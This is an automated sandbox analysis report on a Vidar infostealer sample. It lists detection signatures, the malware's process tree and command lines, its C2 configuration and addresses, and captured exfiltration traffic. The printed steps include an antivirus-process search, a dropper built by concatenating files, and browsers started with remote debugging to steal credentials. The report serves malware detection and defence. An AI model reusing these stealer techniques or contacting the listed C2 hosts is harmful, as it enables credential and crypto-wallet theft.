Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
din.exe

Overview

General Information

Sample name:din.exe
Analysis ID:1581179
MD5:ce76b7cda29a7ea80917e5844a7fca42
SHA1:c9a7eeb65056f6743b3a43ca0a7010743003191f
SHA256:88bced6d92559b9ea1974fd4329868e68c104eb58a976d65b9df8af32bbd2400
Tags:exeVidaruser-lontze7
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Monitors registry run keys for changes
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • din.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\din.exe" MD5: CE76B7CDA29A7EA80917E5844A7FCA42)
    • cmd.exe (PID: 6116 cmdline: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2892 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3744 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6080 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6456 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1292 cmdline: cmd /c md 322891 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1292 cmdline: findstr /V "cache" Bulgaria MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7228 cmdline: cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Centered.com (PID: 7244 cmdline: Centered.com I MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 7736 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
          • chrome.exe (PID: 7992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2232,i,13166791472853580665,17998276385387722307,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • msedge.exe (PID: 4484 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
          • msedge.exe (PID: 7556 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2680 --field-trial-handle=2488,i,17259416842961834522,6867803032885323011,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • choice.exe (PID: 7260 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • msedge.exe (PID: 2028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2340 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6912 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6520 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2008 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6628 --field-trial-handle=2104,i,372054418147138452,11100738905210149726,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 4 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              16.2.Centered.com.49c0000.2.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                16.2.Centered.com.49c0000.2.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
                • 0x2068c:$str01: MachineID:
                • 0x1f051:$str02: Work Dir: In memory
                • 0x206c3:$str03: [Hardware]
                • 0x20675:$str04: VideoCard:
                • 0x1fce5:$str05: [Processes]
                • 0x1fcf1:$str06: [Software]
                • 0x1f1bb:$str07: information.txt
                • 0x20398:$str08: %s\*
                • 0x203e5:$str08: %s\*
                • 0x1f5a2:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
                • 0x1fb61:$str12: UseMasterPassword
                • 0x206cf:$str13: Soft: WinSCP
                • 0x2016e:$str14: <Pass encoding="base64">
                • 0x206b2:$str15: Soft: FileZilla
                • 0x1f1ad:$str16: passwords.txt
                • 0x1fb8c:$str17: build_id
                • 0x1fc80:$str18: file_data

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Browser Started with Remote Debugging
                Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Centered.com I, ParentImage: C:\Users\user\AppData\Local\Temp\322891\Centered.com, ParentProcessId: 7244, ParentProcessName: Centered.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7736, ProcessName: chrome.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\din.exe", ParentImage: C:\Users\user\Desktop\din.exe, ParentProcessId: 7020, ParentProcessName: din.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, ProcessId: 6116, ProcessName: cmd.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Search for Antivirus process
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6116, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 6456, ProcessName: findstr.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:10:03.389881+010020442471Malware Command and Control Activity Detected188.245.216.205443192.168.2.749781TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:10:06.124264+010020518311Malware Command and Control Activity Detected188.245.216.205443192.168.2.749782TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:10:06.124006+010020490871A Network Trojan was detected192.168.2.749782188.245.216.205443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T07:09:58.205436+010028593781Malware Command and Control Activity Detected192.168.2.749771188.245.216.205443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Multi AV Scanner detection for submitted file
                Source: din.exeVirustotal: Detection: 22%Perma Link
                Source: din.exeReversingLabs: Detection: 55%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.0% probability
                Source: din.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: din.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cryptosetup.pdbGCTL source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: Binary string: cryptosetup.pdb source: Centered.com, 00000010.00000002.2504659598.00000000049AC000.00000004.00000800.00020000.00000000.sdmp, 5F3EKF.16.dr
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6DC54
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A087
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,16_2_00F7A1E2
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,16_2_00F6E472
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,16_2_00F7A570
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F766DC FindFirstFileW,FindNextFileW,FindClose,16_2_00F766DC
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3C622 FindFirstFileExW,16_2_00F3C622
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F773D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,16_2_00F773D4
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F77333 FindFirstFileW,FindClose,16_2_00F77333
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F6D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,16_2_00F6D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\322891\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: chrome.exeMemory has grown: Private usage: 8MB later: 30MB

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.7:49771 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.7:49782 -> 188.245.216.205:443
                Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.7:49781
                Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.7:49782
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
                Source: Joe Sandbox ViewIP Address: 18.238.49.74 18.238.49.74
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.101
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.12
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.21
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.32
                Source: unknownTCP traffic detected without corresponding DNS query: 18.238.49.74
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F7D889 InternetReadFile,SetEvent,GetLastError,SetEvent,16_2_00F7D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
